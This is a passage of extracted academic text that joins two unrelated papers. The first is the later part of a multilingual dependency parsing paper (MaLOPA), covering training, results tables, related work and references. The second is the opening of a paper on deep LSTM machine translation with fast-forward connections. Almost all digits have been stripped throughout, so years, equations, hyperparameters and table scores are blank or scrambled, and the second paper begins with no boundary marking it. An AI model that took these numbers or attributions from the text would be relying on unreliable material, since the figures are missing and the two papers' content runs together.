stack components of the transition-based parser. this multi-task learning setup enables us to predict both pos tags and dependency trees in the same model. we note that pretrained word embed- dings, cluster embeddings and language embeddings are shared for tagging and parsing. block dropout. we use an independently devel- oped variant of word dropout (iyyer et al., ), which we call block dropout. the token representa- tion used for parsing includes the embedding of pre- dicted pos tags, which may be incorrect. we intro- duce another modification which makes the parser more robust to incorrect pos tag predictions, by stochastically zeroing out the entire embedding of the pos tag. while training the parser, we replace the pos embedding vector e with another vector (of the same dimensionality) stochastically computed as: e′ = ( − b)/µ × e, where b ∈ { , } is a bernoulli-distributed random variable with parame- ter µ which is initialized to . (i.e., always dropout, setting b = ,e′ = ), and is dynamically updated to match the error rate of the pos tagger on the de- velopment set. at test time, we never dropout the predicted pos embedding, i.e., e′ = e. intuitively, this method extends the dropout method (srivastava et al., ) to address structured noise in the input layer. experiments in this section, we evaluate the malopa approach in three data scenarios: when the target language has a large treebank (table ), a small treebank (table ) or no treebank (table ). data. for experiments where the target language has a large treebank, we use the standard data splits for german (de), english (en), spanish (es), french (fr), italian (it), portuguese (pt) and swedish (sv) in the latest release (version . ) of universal depen- dencies (nivre et al., a), and experiment with both gold and predicted pos tags. for experiments where the target language has no treebank, we use the standard splits for these languages in the older universal dependency treebanks v . (mcdonald et al., ) and use gold pos tags, following the base- lines (zhang and barzilay, ; guo et al., ). table gives the number of sentences and words annotated for each language in both versions. in a preprocessing step, we lowercase all tokens and re- move multi-word annotations and language-specific dependency relations. we use the same multilingual brown clusters and multilingual embeddings of guo et al. ( ), kindly provided by the authors. optimization. we follow dyer et al. ( ) in parameter initialization and optimization. how- ever, when training the parser on multiple languages we use stochastic gradient updates with an initial learn- ing rate of η = . in epoch # , update the learning rate in following epochs as ηt = η /( + . t). we clip the ` norm of the gradient to avoid “exploding” gradients. unla- beled attachment score (uas) on the development set deter- mines early stopping. parameters are initialized with uniform samples in ± √ /(r + c) where r and c are the sizes of the previous and following layer in the nueral network (glorot and bengio, ). the standard deviations of the labeled attach- ment score (las) due to random initialization in individual tar- get languages are . (de), . (en), . (es), . (fr), . (it), . (pt) and . (sv). the standard deviation of the aver- age las scores across languages is . . las target language average de en es fr it pt sv monolingual . . . . . . . . malopa . . . . . . . . +lexical . . . . . . . . +language id . . . . . . . . +fine-grained pos . . . . . . . . table : dependency parsing: labeled attachment scores (las) for monolingually-trained parsers and malopa in the fully supervised scenario where lt = ls. note that we use the universal dependencies verson . which only includes annotations for ∼ , english sentences, which explains the relatively low scores in english. when we instead use the universal dependency treebanks version . which includes annotations for ∼ , english sentences (originally from the english penn treebank), we achieve uas score . and las score . . in malopa, instead of updating the parameters with the gradient of individual sentences, we use mini-batch updates which include one sentence sam- pled uniformly (without replacement) from each language’s treebank, until all sentences in the small- est treebank are used (which concludes an epoch). we repeat the same process in following epochs. we found this to help prevent one source language with a larger treebank (e.g., german) from dominat- ing parameter updates at the expense of other source languages with a smaller treebank (e.g., swedish). . target languages with a treebank (lt = ls) here, we evaluate our malopa parser when the target language has a treebank. baseline. for each target language, the strong baseline we use is a monolingually-trained s-lstm parser with a token representation which concate- nates: pretrained word embeddings ( dimen- sions), learned word embeddings ( dimensions), coarse (universal) pos tag embeddings ( dimen- sions), fine-grained (language-specific, when avail- able) pos tag embeddings ( dimensions), and em- beddings of brown clusters ( dimensions), and uses a two-layer s-lstm for each of the stack, the buffer and the list of actions. we independently train one baseline parser for each target language, and share no model parameters. this baseline, denoted these embeddings are treated as fixed inputs to the parser, and are not optimized towards the parsing objective. we use the same embeddings used in guo et al. ( ). ‘monolingual’ in tables and , achieves uas score . and las score . when trained on the en- glish penn treebank, which is comparable to dyer et al. ( ). malopa. we train malopa on the concante- nation of training sections of all seven languages. to balance the development set, we only concatenate the first sentences of each language’s develop- ment section. token representations. the first mal- opa parser we evaluate uses only coarse pos embeddings to construct the token representation. as shown in table , this parser consistently underperforms the monolingual baselines, with a gap of . las points on average. augmenting the token representation with lexical embeddings to the token representation (both mul- tilingual word clusters and pretrained multilingual word embeddings, as described in § . ) substan- tially improves the performance of malopa, re- covering % of the gap in average performance. we experimented with three ways to include language information in the token representation, namely: ‘language id’, ‘word order’ and ‘full ty- pology’ (see § . for details), and found all three to improve the performance of malopa giving las scores . , . and . , respectively. it is noteworthy that the model benefits more from lan- we use the same number of dimensions for the coarse pos embeddings as in the monolingual baselines. the same applies to all other types of embeddings used in malopa. recall % left right root short long nsubj* dobj conj *comp case *mod monolingual . . . . . . . . . . . malopa . . . . . . . . . . . +lexical . . . . . . . . . . . +language id . . . . . . . . . . . +fine-grained pos . . . . . . . . . . . table : recall of some classes of dependency attachments/relations in german. las target language average language id coarse pos de en es fr it pt sv gold gold . . . . . . . . predicted gold . . . . . . . . gold predicted . . . . . . . . predicted predicted . . . . . . . . table : effect of automatically predicting language id and pos tags with malopa on las scores. guage id than from typological properties. using ‘language id,’ we recover another % of the origi- nal gap. finally, the best configuration of malopa adds fine-grained pos embeddings to the token represen- tation. surprisingly, adding fine-grained pos em- beddings improves the performance even for some languages where fine-grained pos tags are not avail- able (e.g., spanish). this parser outperforms the monolingual baseline in five out of seven target lan- guages, and wins on average by . las points. we emphasize that this model is only trained once on all languages, and the same model is used to parse the test set of each language, which simplifies the distribution or deployment of multilingual parsing software. qualitative analysis. to gain a better understand- ing of the model behavior, we analyze certain classes of dependency attachments/relations in ger- man, which has notably flexible word order, in ta- ble . we consider the recall of left attachments (where the head word precedes the dependent word in the sentence), right attachments, root attach- ments, short-attachments (with distance = ), long- attachments (with distance > ), as well as the fol- lowing relation groups: nsubj* (nominal subjects: fine-grained pos tags were only available for english, italian, portuguese and swedish. other languages reuse the coarse pos tags as fine-grained tags instead of padding the ex- tra dimensions in the token representation with zeros. nsubj, nsubjpass), dobj (direct object: dobj), conj (conjunct: conj), *comp (clausal comple- ments: ccomp, xcomp), case (clitics and adposi- tions: case), *mod (modifiers of a noun: nmod, nummod, amod, appos), neg (negation modifier: neg). findings. we found that each of the three im- provements (lexical embeddings, language embed- dings and fine-grained pos embeddings) tends to improve recall for most classes. malopa un- derperforms (compared to the monolingual base- line) in some classes: nominal subjects, direct ob- jects and modifiers of a noun. nevertheless, mal- opa outperforms the baseline in some important classes such as: root, long attachments and conjunc- tions. predicting language ids and pos tags. in ta- ble , we assume that both gold language id of the input language and gold pos tags are given at test time. however, this assumption is not realistic in practical applications. here, we quantify the degra- dation in parsing accuracy when language id and pos tags are only given at training time, but must be predicted at test time. we do not use fine-grained for each group, we report recall of both the attach- ment and relation weighted by the number of instances in the gold annotation. a detailed description of each relation can be found at http://universaldependencies.org/ u/dep/index.html http://universaldependencies.org/u/dep/index.html http://universaldependencies.org/u/dep/index.html pos tags in these experiments because some lan- guages use a very large fine-grained pos tag set (e.g., unique tags in portuguese). in order to predict language id, we use the langid.py library (lui and baldwin, ) and classify individual sentences in the test sets to one of the seven languages of interest, using the default models included in the library. the macro aver- age language id prediction accuracy on the test set across sentences is . %. in order to predict pos tags, we use the model described in § . with both input and hidden lstm dimensions of , and with block dropout. the macro average accuracy of the pos tagger is . %. table summarizes the four configurations: {gold language id, predicted lan- guage id} × {gold pos tags, predicted pos tags}. the performance of the parser suffers mildly (– . las points) when using predicted language ids, but more (– . las points) when using predicted pos tags. as an alternative approach to predicting pos tags, we trained the stanford pos tagger, for each target language, on the coarse pos tag annota- tions in the training section of the universal depen- dency treebanks, then replaced the gold pos tags in the test set of each language with predictions of the monolingual tagger. the resulting degradation in parsing performance between gold vs. predicted pos tags is – . las points (on average, compared to a degradation of – . las points in table ). the disparity in parsing results with gold vs. predicted pos tags is an important open problem, and has been previously discussed by tiedemann ( ). the predicted pos results in table use block dropout. without using block dropout, we lose an extra . las points in both configurations using predicted pos tags. different multilingual embeddings. several methods have been proposed for pretraining mul- tilingual word embeddings. we compare three of them: • multicca (ammar et al., ) uses a lin- https://github.com/saffsd/langid.py we used version . . of the stanford pos tag- ger, with the following pre-packaged configuration files: german-fast-caseless.tagger.props (de), english-caseless- left words-distsim.tagger.props (en), spanish.tagger.props (es), french.tagger.props (fr). we reused french.tagger.props for (it, pt, sv). multilingual embeddings uas las multicluster . . multicca . . robust projection . . table : effect of multilingual embedding estima- tion method on the multilingual parsing with mal- opa. uas and las scores are macro-averaged across seven target languages. ear operator to project pretrained monolingual embeddings in each language (except english) to the vector space of pretrained english word embeddings. • multicluster (ammar et al., ) uses the same embedding for translationally-equivalent words in different languages. • robust projection (guo et al., ) first pre- trains monolingual english word embeddings, then defines the embedding of a non-english word as the weighted average embedding of english words aligned to the non-english words (in a parallel corpus). the embedding of a non-english word which is not aligned to any english words is defined as the average embed- ding of words with a unit edit distance in the same language (e.g., ‘playz’ is the average of ‘plays’ and ‘play’). all embeddings are trained on the same data and use the same number of dimensions ( ). table il- lustrates that the three methods perform similarly on this task. aside from table , in this paper, we ex- clusively use the robust projection multilingual em- beddings trained in guo et al. ( ). the “ro- bust projection” result in table (which uses dimensions) is comparable to the last row in table (which uses dimensions). our implementation of this method can be found at https://github.com/gmulcaire/ average-embeddings. we share the embedding files at https://github. com/clab/language-universal-parser/tree/ master/pretrained_embeddings. the embeddings were kindly provided by the authors of guo et al. ( ) at https://drive.google.com/ file/d/ b z ix jd_dy lmn ntdy nfu/view https://github.com/saffsd/langid.py https://github.com/gmulcaire/average-embeddings https://github.com/gmulcaire/average-embeddings https://github.com/clab/language-universal-parser/tree/master/pretrained_embeddings https://github.com/clab/language-universal-parser/tree/master/pretrained_embeddings https://github.com/clab/language-universal-parser/tree/master/pretrained_embeddings https://drive.google.com/file/d/ b z ix jd_dy lmn ntdy nfu/view https://drive.google.com/file/d/ b z ix jd_dy lmn ntdy nfu/view las target language de es fr it sv monolingual . . . . . duong et al. . . . . . malopa . . . . . table : small ( , token) target treebank setting: language-universal dependency parser performance. small target treebank. duong et al. ( b) con- sidered a setup where the target language has a small treebank of ∼ , tokens, and the source language (english) has a large treebank of ∼ , tokens. the parser proposed in duong et al. ( b) is a neural network parser based on chen and manning ( ), which shares most of the parameters be- tween english and the target language, and uses an ` regularizer to tie the lexical embeddings of translationally-equivalent words. while not the pri- mary focus of this paper, we compare our pro- posed method to that of duong et al. ( b) on five target languages for which multilingual brown clusters are available from guo et al. ( ). for each target language, we train the parser on the en- glish training data in the ud version . corpus (nivre et al., b) and a small treebank in the target language. following duong et al. ( b), in this setup, we only use gold coarse pos tags, we do not use any development data in the target languages (we use the english development set in- stead), and we subsample the english training data in each epoch to the same number of sentences in the target language. we use the same hyperparameters specified before for the single malopa parser and each of the monolingual baselines. table shows that our method outperforms duong et al. ( b) by . las points on average. our method consis- tently outperforms the monolingual baselines in this the setup cost involved in recruiting linguists, developing and revising annotation guidelines to annotate a new language ought to be higher than the cost of annotating , tokens. af- ter investing much resources in a language, we believe it is un- realistic to stop the annotation effort after only , tokens. we thank long duong for sharing the processed, subsampled training corpora in each target language at https://github.com/longdt /universal_ dependency_parser/tree/master/data/ universal-dep/universal-dependencies- . . setup, with an average improvement of . absolute las points. . target languages without a treebank (lt ∩ls = ∅) mcdonald et al. ( ) established that, when no treebank annotations are available in the target lan- guage, training on multiple source languages out- performs training on one (i.e., multi-source model transfer outperforms single-source model transfer). in this section, we evaluate the performance of our parser in this setup. we use two strong baseline multi-source model transfer parsers with no super- vision in the target language: • zhang and barzilay ( ) is a graph-based arc- factored parsing model with a tensor-based scor- ing function. it takes typological properties of a language as input. we compare to the best reported configuration (i.e., the column titled “ours” in table of zhang and barzilay, ). • guo et al. ( ) is a transition-based neural- network parsing model based on chen and man- ning ( ). it uses a multilingual embeddings and brown clusters as lexical features. we com- pare to the best reported configuration (i.e., the column titled “multi-proj” in table of guo et al., ). following guo et al. ( ), for each target lan- guage, we train the parser on six other languages in the google universal dependency treebanks version . (de, en, es, fr, it, pt, sv, excluding whichever is the target language), and we use gold coarse pos tags. our parser uses the same word embeddings and word clusters used in guo et al. ( ), and does not use any typology information. the results in table show that, on average, our parser outperforms both baselines by more than point in las, and gives the best las results in four (out of six) languages. related work our work builds on the model transfer approach, which was pioneered by zeman and resnik ( ) https://github.com/ryanmcd/uni-dep-tb/ in preliminary experiments, we found language embed- dings to hurt the performance of the parser for target languages without a treebank. https://github.com/longdt /universal_dependency_parser/tree/master/data/universal-dep/universal-dependencies- . https://github.com/longdt /universal_dependency_parser/tree/master/data/universal-dep/universal-dependencies- . https://github.com/longdt /universal_dependency_parser/tree/master/data/universal-dep/universal-dependencies- . https://github.com/ryanmcd/uni-dep-tb/ las target language average de es fr it pt sv zhang and barzilay ( ) . . . . . . . guo et al. ( ) . . . . . . . malopa . . . . . . . table : dependency parsing: labeled attachment scores (las) for multi-source transfer parsers in the simulated low-resource scenario where lt ∩ls = ∅. who trained a parser on a source language treebank then applied it to parse sentences in a target lan- guage. cohen et al. ( ) and mcdonald et al. ( ) trained unlexicalized parsers on treebanks of multiple source languages and applied the parser to different languages. naseem et al. ( ), täck- ström et al. ( ), and zhang and barzilay ( ) used language typology to improve model trans- fer. to add lexical information, täckström et al. ( ) used multilingual word clusters, while xiao and guo ( ), guo et al. ( ), søgaard et al. ( ) and guo et al. ( ) used multilingual word embeddings. duong et al. ( b) used a neural network based model, sharing most of the parame- ters between two languages, and used an ` regular- izer to tie the lexical embeddings of translationally- equivalent words. we incorporate these ideas in our framework, while proposing a novel neural ar- chitecture for embedding language typology (see § . ), and use a variant of word dropout (iyyer et al., ) for consuming noisy structured inputs. we also show how to replace an array of mono- lingually trained parsers with one multilingually- trained parser without sacrificing accuracy, which is related to vilares et al. ( ). neural network parsing models which preceded dyer et al. ( ) include henderson ( ), titov and henderson ( ), henderson and titov ( ) and chen and manning ( ). related to lexi- cal features in cross-lingual parsing is durrett et al. ( ) who defined lexico-syntactic features based on bilingual lexicons. other related work include Östling ( ), which may be used to induce more useful typological properties to inform multilingual parsing. another popular approach for cross-lingual su- pervision is to project annotations from the source language to the target language via a parallel cor- pus (yarowsky et al., ; hwa et al., ) or via automatically-translated sentences (tiedemann et al., ). ma and xia ( ) used entropy regu- larization to learn from both parallel data (with pro- jected annotations) and unlabeled data in the target language. rasooli and collins ( ) trained an array of target-language parsers on fully annotated trees, by iteratively decoding sentences in the tar- get language with incomplete annotations. one re- search direction worth pursuing is to find synergies between the model transfer approach and annotation projection approach. conclusion we presented malopa, a single parser trained on a multilingual set of treebanks. we showed that this parser, equipped with language embeddings and fine-grained pos embeddings, on average outper- forms monolingually-trained parsers for target lan- guages with a treebank. this pattern of results is quite encouraging. although languages may share underlying syntactic properties, individual parsing models must behave quite differently, and our model allows this while sharing parameters across lan- guages. the value of this sharing is more pro- nounced in scenarios where the target language’s training treebank is small or non-existent, where our parser outperforms previous cross-lingual multi- source model transfer methods. acknowledgments waleed ammar is supported by the google fellow- ship in natural language processing. miguel balles- teros is supported by the european commission un- der the contract numbers fp -ict- (project multisensor) and h -ria- (project kristina). part of this material is based upon work supported by a subcontract with raytheon bbn technologies corp. under darpa prime con- tract no. hr - -c- , and part of this re- search was supported by a google research award to noah smith. we thank jiang guo for sharing the multilingual word embeddings and multilingual word clusters. we thank lori levin, ryan mc- donald, jörg tiedemann, yulia tsvetkov, and yuan zhang for helpful discussions. last but not least, we thank the anonymous tacl reviewers for their valuable feedback. references Željko agić, maria jesus aranzabe, aitziber atutxa, cristina bosco, jinho choi, marie-catherine de marn- effe, timothy dozat, richárd farkas, jennifer foster, filip ginter, iakes goenaga, koldo gojenola, yoav goldberg, jan hajič, anders trærup johannsen, jenna kanerva, juha kuokkala, veronika laippala, alessan- dro lenci, krister lindén, nikola ljubešić, teresa lynn, christopher manning, héctor alonso martínez, ryan mcdonald, anna missilä, simonetta monte- magni, joakim nivre, hanna nurmi, petya osenova, slav petrov, jussi piitulainen, barbara plank, prokopis prokopidis, sampo pyysalo, wolfgang seeker, moj- gan seraji, natalia silveira, maria simi, kiril simov, aaron smith, reut tsarfaty, veronika vincze, and daniel zeman. . universal dependencies . . lindat/clarin digital library at the institute of formal and applied linguistics, charles university in prague. waleed ammar, george mulcaire, yulia tsvetkov, guil- laume lample, chris dyer, and noah a. smith. . massively multilingual word embeddings. arxiv: . v . utsab barman, amitava das, joachim wagner, and jen- nifer foster. . code mixing: a challenge for lan- guage identification in the language of social media. in emnlp workshop on computational approaches to code switching. emily m. bender. . on achieving and evaluating language-independence in nlp. linguistic issues in language technology, ( ): – . sabine buchholz and erwin marsi. . conll-x shared task on multilingual dependency parsing. in proc. of conll. danqi chen and christopher manning. . a fast and accurate dependency parser using neural networks. in proc. of emnlp. shay b. cohen, dipanjan das, and noah a. smith. . unsupervised structure prediction with non-parallel multilingual guidance. in proc. of emnlp. matthew s. dryer and martin haspelmath, editors. . wals online. max planck institute for evolutionary anthropology, leipzig. long duong, trevor cohn, steven bird, and paul cook. a. low resource dependency parsing: cross- lingual parameter sharing in a neural network parser. in proc. of acl-ijcnlp. long duong, trevor cohn, steven bird, and paul cook. b. a neural network model for low-resource uni- versal dependency parsing. in proc. of emnlp. greg durrett, adam pauls, and dan klein. . syn- tactic transfer using a bilingual lexicon. in proc. of emnlp. chris dyer, miguel ballesteros, wang ling, austin matthews, and noah a. smith. . transition- based dependency parsing with stack long short-term memory. in proc. of acl. matt gardner, kejun huang, evangelos papalexakis, xiao fu, partha talukdar, christos faloutsos, nicholas sidiropoulos, and tom mitchell. . translation in- variant word embeddings. in proc. of emnlp. xavier glorot and yoshua bengio. . understand- ing the difficulty of training deep feedforward neural networks. in proc. of aistats. alan graves, abdel-rahman mohamed, and geoffrey hinton. . speech recognition with deep recurrent neural networks. in proc. of icassp. jiang guo, wanxiang che, david yarowsky, haifeng wang, and ting liu. . cross-lingual dependency parsing based on distributed representations. in proc. of acl. jiang guo, wanxiang che, david yarowsky, haifeng wang, and ting liu. . a representation learning framework for multi-source transfer parsing. in proc. of aaai. ulrich heid and sybille raab. . collocations in multilingual generation. in proc. of eacl. james henderson and ivan titov. . incremental sig- moid belief networks for grammar learning. journal of machine learning research, : – . james henderson. . inducing history representa- tions for broad coverage statistical parsing. in proc. of naacl-hlt. zhiheng huang, wei xu, and kai yu. . bidi- rectional lstm-crf models for sequence tagging. arxiv: . . rebecca hwa, philip resnik, amy weinberg, clara cabezas, and okan kolak. . bootstrapping parsers via syntactic projection across parallel texts. natural language engineering, ( ): – . mohit iyyer, varun manjunatha, jordan l. boyd-graber, and hal daumé. . deep unordered composi- tion rivals syntactic methods for text classification. in proc. of acl. marco lui and timothy baldwin. . langid.py: an off-the-shelf language identification tool. in proc. of acl. xuezhe ma and fei xia. . unsupervised depen- dency parsing with transferring distribution via paral- lel guidance and entropy regularization. in proc. of acl. ryan mcdonald, slav petrov, and keith hall. . multi-source transfer of delexicalized dependency parsers. in proc. of emnlp. ryan mcdonald, joakim nivre, yvonne quirmbach- brundage, yoav goldberg, dipanjan das, kuzman ganchev, keith hall, slav petrov, hao zhang, oscar täckström, claudia bedini, núria bertomeu castelló, and jungmee lee. . universal dependency anno- tation for multilingual parsing. in proc. of acl. tomas mikolov, kai chen, greg corrado, and jeffrey dean. . efficient estimation of word represen- tations in vector space. in proc. of iclr. tahira naseem, regina barzilay, and amir globerson. . selective sharing for multilingual dependency parsing. in proc. of acl. joakim nivre and jens nilsson. . pseudo-projective dependency parsing. in proc. of acl. joakim nivre, johan hall, sandra kubler, ryan mcdon- ald, jens nilsson, sebastian riedel, and deniz yuret. . the conll shared task on dependency parsing. in proc. of conll. joakim nivre, Željko agić, maria jesus aranzabe, masayuki asahara, aitziber atutxa, miguel balles- teros, john bauer, kepa bengoetxea, riyaz ah- mad bhat, cristina bosco, sam bowman, giuseppe g. a. celano, miriam connor, marie-catherine de marneffe, arantza diaz de ilarraza, kaja do- brovoljc, timothy dozat, tomaž erjavec, richárd farkas, jennifer foster, daniel galbraith, filip gin- ter, iakes goenaga, koldo gojenola, yoav gold- berg, berta gonzales, bruno guillaume, jan ha- jič, dag haug, radu ion, elena irimia, anders jo- hannsen, hiroshi kanayama, jenna kanerva, simon krek, veronika laippala, alessandro lenci, nikola ljubešić, teresa lynn, christopher manning, cătălina mărănduc, david mareček, héctor martínez alonso, jan mašek, yuji matsumoto, ryan mcdonald, anna missilä, verginica mititelu, yusuke miyao, simon- etta montemagni, shunsuke mori, hanna nurmi, petya osenova, lilja Øvrelid, elena pascual, marco passarotti, cenel-augusto perez, slav petrov, jussi piitulainen, barbara plank, martin popel, prokopis prokopidis, sampo pyysalo, loganathan ramasamy, rudolf rosa, shadi saleh, sebastian schuster, wolf- gang seeker, mojgan seraji, natalia silveira, maria simi, radu simionescu, katalin simkó, kiril simov, aaron smith, jan Štěpánek, alane suhr, zsolt szántó, takaaki tanaka, reut tsarfaty, sumire uematsu, lar- raitz uria, viktor varga, veronika vincze, zdeněk Žabokrtský, daniel zeman, and hanzhi zhu. a. universal dependencies . . lindat/clarin digi- tal library at the institute of formal and applied lin- guistics, charles university in prague. joakim nivre, cristina bosco, jinho choi, marie- catherine de marneffe, timothy dozat, richárd farkas, jennifer foster, filip ginter, yoav gold- berg, jan hajič, jenna kanerva, veronika laippala, alessandro lenci, teresa lynn, christopher manning, ryan mcdonald, anna missilä, simonetta monte- magni, slav petrov, sampo pyysalo, natalia silveira, maria simi, aaron smith, reut tsarfaty, veronika vincze, and daniel zeman. b. universal depen- dencies . . lindat/clarin digital library at the institute of formal and applied linguistics, charles university in prague. joakim nivre. . incrementality in deterministic de- pendency parsing. in proceedings of the workshop on incremental parsing: bringing engineering and cog- nition together. robert Östling. . word order typology through mul- tilingual word alignment. in proc. of acl-ijcnlp. slav petrov, dipanjan das, and ryan mcdonald. . a universal part-of-speech tagset. in proc. of lrec. mohammad sadegh rasooli and michael collins. . density-driven cross-lingual transfer of dependency parsers. in proc. of emnlp. deitmar rösner. . the generation system of the semsyn project: towards a task-independent gener- ator for german. advances in natural language gen- eration, . anders søgaard, Željko agić, héctor martínez alonso, barbara plank, bernd bohnet, and anders johannsen. . inverted indexing for cross-lingual nlp. in proc. of acl-ijcnlp . nitish srivastava, geoffrey hinton, alex krizhevsky, ilya sutskever, and ruslan salakhutdinov. . dropout: a simple way to prevent neural networks from overfitting. journal of machine learning re- search, ( ): – . ilya sutskever, oriol vinyals, and quoc v. le. . sequence to sequence learning with neural networks. in nips. oscar täckström, ryan mcdonald, and jakob uszkoreit. . cross-lingual word clusters for direct transfer of linguistic structure. in proc. of naacl-hlt. oscar täckström, dipanjan das, slav petrov, ryan mc- donald, and joakim nivre. . token and type constraints for cross-lingual part-of-speech tagging. transactions of the association for computational linguistics, : – . jörg tiedemann, zeljko agic, and joakim nivre. . treebank translation for cross-lingual parser induc- tion. in proc. of conll. jörg tiedemann. . cross-lingual dependency pars- ing with universal dependencies and predicted pos la- bels. in proc. of international conference on depen- dency linguistics (depling). ivan titov and james henderson. . constituent parsing with incremental sigmoid belief networks. in proc. of acl. david vilares, carlos gómez-rodríguez, and miguel a. alonso. . one model, two languages: train- ing bilingual parsers with harmonized treebanks. arxiv: . v . wikipedia. . list of languages by number of native speakers. http://bit.ly/ lup kj. accessed: - - . min xiao and yuhong guo. . distributed word representation learning for cross-lingual dependency parsing. in proc. of conll. david yarowsky, grace ngai, and richard wicentowski. . inducing multilingual text analysis tools via robust projection across aligned corpora. in proc. of hlt. daniel zeman and philip resnik. . cross-language parser adaptation between related languages. in proc. of ijcnlp. yuan zhang and regina barzilay. . hierarchical low-rank tensors for multilingual transfer parsing. in proc. of emnlp. http://bit.ly/ lup kj deep recurrent models with fast-forward connections for neural machine translation jie zhou ying cao xuguang wang peng li wei xu baidu research - institute of deep learning baidu inc., beijing, china {zhoujie ,caoying ,wangxuguang,lipeng ,wei.xu}@baidu.com abstract neural machine translation (nmt) aims at solving machine translation (mt) problems using neural networks and has exhibited promising results in recent years. however, most of the existing nmt models are shallow and there is still a performance gap between a single nmt model and the best conventional mt system. in this work, we introduce a new type of linear connections, named fast- forward connections, based on deep long short-term memory (lstm) networks, and an interleaved bi-directional architecture for stacking the lstm layers. fast-forward con- nections play an essential role in propagat- ing the gradients and building a deep topol- ogy of depth . on the wmt’ english- to-french task, we achieve bleu= . with a single attention model, which outperforms the corresponding single shallow model by . bleu points. this is the first time that a sin- gle nmt model achieves state-of-the-art per- formance and outperforms the best conven- tional model by . bleu points. we can still achieve bleu= . even without using an attention mechanism. after special han- dling of unknown words and model ensem- bling, we obtain the best score reported to date on this task with bleu= . . our models are also validated on the more difficult wmt’ english-to-german task. introduction neural machine translation (nmt) has attracted a lot of interest in solving the machine translation (mt) problem in recent years (kalchbrenner and blunsom, ; sutskever et al., ; bahdanau et al., ). unlike conventional statistical ma- chine translation (smt) systems (koehn et al., ; durrani et al., ) which consist of multi- ple separately tuned components, nmt models en- code the source sequence into continuous represen- tation space and generate the target sequence in an end-to-end fashon. moreover, nmt models can also be easily adapted to other tasks such as dialog systems (vinyals and le, ), question answering systems (yu et al., ) and image caption genera- tion (mao et al., ). in general, there are two types of nmt topolo- gies: the encoder-decoder network (sutskever et al., ) and the attention network (bahdanau et al., ). the encoder-decoder network represents the source sequence with a fixed dimensional vector and the target sequence is generated from this vector word by word. the attention network uses the repre- sentations from all time steps of the input sequence to build a detailed relationship between the target words and the input words. recent results show that the systems based on these models can achieve sim- ilar performance to conventional smt systems (lu- ong et al., ; jean et al., ). however, a single neural model of either of the above types has not been competitive with the best conventional system (durrani et al., ) when evaluated on the wmt’ english-to-french task. the best bleu score from a single model with six layers is only . (luong et al., ) while the conventional method of (durrani et al., ) achieves . . we focus on improving the single model perfor- transactions of the association for computational linguistics, vol. , pp. – , . action editor: holger schwenk. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. mance by increasing the model depth. deep topol- ogy has been proven to outperform the shallow ar- chitecture in computer vision. in the past two years the top positions of the imagenet contest have al- ways been occupied by systems with tens or even hundreds of layers (szegedy et al., ; he et al., ). but in nmt, the biggest depth used success- fully is only six (luong et al., ). we attribute this problem to the properties of the long short- term memory (lstm) (hochreiter and schmid- huber, ) which is widely used in nmt. in the lstm, there are more non-linear activations than in convolution layers. these activations significantly decrease the magnitude of the gradient in the deep topology, especially when the gradient propagates in recurrent form. there are also many efforts to increase the depth of the lstm such as the work by kalchbrenner et al. ( ), where the shortcuts do not avoid the nonlinear and recurrent computation. in this work, we introduce a new type of lin- ear connections for multi-layer recurrent networks. these connections, which are called fast-forward connections, play an essential role in building a deep topology with depth of . in addition, we in- troduce an interleaved bi-directional architecture to stack lstm layers in the encoder. this topology can be used for both the encoder-decoder network and the attention network. on the wmt’ english- to-french task, this is the deepest nmt topology that has ever been investigated. with our deep at- tention model, the bleu score can be improved to . outperforming the shallow model which has six layers (luong et al., ) by . bleu points. this is also the first time on this task that a single nmt model achieves state-of-the-art performance and outperforms the best conventional smt sys- tem (durrani et al., ) with an improvement of . . even without using the attention mechanism, we can still achieve . with a single model. after model ensembling and unknown word processing, the bleu score can be further improved to . . when evaluated on the subset of the test corpus without unknown words, our model achieves . . as a reference, previous work showed that oracle re- scoring of the -best sequences generated by the smt model can achieve the bleu score of about (sutskever et al., ). our models are also validated on the more difficult wmt’ english-to- german task. neural machine translation neural machine translation aims at generating the target word sequence y = {y , . . . ,yn} given the source word sequence x = {x , . . . ,xm} with neu- ral models. in this task, the likelihood p(y | x,θ) of the target sequence will be maximized (forcada and ñeco, ) with parameter θ to learn: p(y | x;θ) = m+ ∏ j= p(yj | y :j− ,x;θ) ( ) where y :j− is the sub sequence from y to yj− . y and ym+ denote the start mark and end mark of target sequence respectively. the process can be explicitly split into an encod- ing part, a decoding part and the interface between these two parts. in the encoding part, the source se- quence is processed and transformed into a group of vectors e = {e , · · · ,em} for each time step. fur- ther operations will be used at the interface part to extract the final representation c of the source se- quence from e. at the decoding step, the target se- quence is generated from the representation c. recently, there have been two types of nmt mod- els which are different in the interface part. in the encoder-decoder model (sutskever et al., ), a single vector extracted from e is used as the rep- resentation. in the attention model (bahdanau et al., ), c is dynamically obtained according to the relationship between the target sequence and the source sequence. the recurrent neural network (rnn), or its spe- cific form the lstm, is generally used as the basic unit of the encoding and decoding part. however, the topology of most of the existing models is shal- low. in the attention network, the encoding part and the decoding part have only one lstm layer respec- tively. in the encoder-decoder network, researchers have used at most six lstm layers (luong et al., ). because machine translation is a difficult problem, we believe more complex encoding and decoding architecture is needed for modeling the re- lationship between the source sequence and the tar- get sequence. in this work, we focus on enhancing the complexity of the encoding/decoding architec- ture by increasing the model depth. deep neural models have been studied in a wide range of problems. in computer vision, models with more than ten convolution layers outperform shallow ones on a series of image tasks in recent years (srivastava et al., ; he et al., ; szegedy et al., ). different kinds of shortcut connections are proposed to decrease the length of the gradient propagation path. training networks based on lstm layers, which are widely used in language problems, is a much more challenging task. because of the existence of many more nonlin- ear activations and the recurrent computation, gradi- ent values are not stable and are generally smaller. following the same spirit for convolutional net- works, a lot of effort has also been spent on training deep lstm networks. yao et al. ( ) introduced depth-gated shortcuts, connecting lstm cells at ad- jacent layers, to provide a fast way to propagate the gradients. they validated the modification of these shortcuts on an mt task and a language modeling task. however, the best score was obtained using models with three layers. similarly, kalchbrenner et al. ( ) proposed a two dimensional structure for the lstm. their structure decreases the number of nonlinear activations and path length. however, the gradient propagation still relies on the recurrent computation. the investigations were also made on question-answering to encode the questions, where at most two lstm layers were stacked (hermann et al., ). based on the above considerations, we propose new connections to facilitate gradient propagation in the following section. deep topology we build the deep lstm network with the new pro- posed linear connections. the shortest paths through the proposed connections do not include any non- linear transformations and do not rely on any recur- rent computation. we call these connections fast- forward connections. within the deep topology, we also introduce an interleaved bi-directional architec- ture to stack the lstm layers. . network our entire deep neural network is shown in fig. . this topology can be divided into three parts: the encoder part (p-e) on the left, the decoder part (p- d) on the right and the interface between these two parts (p-i) which extracts the representation of the 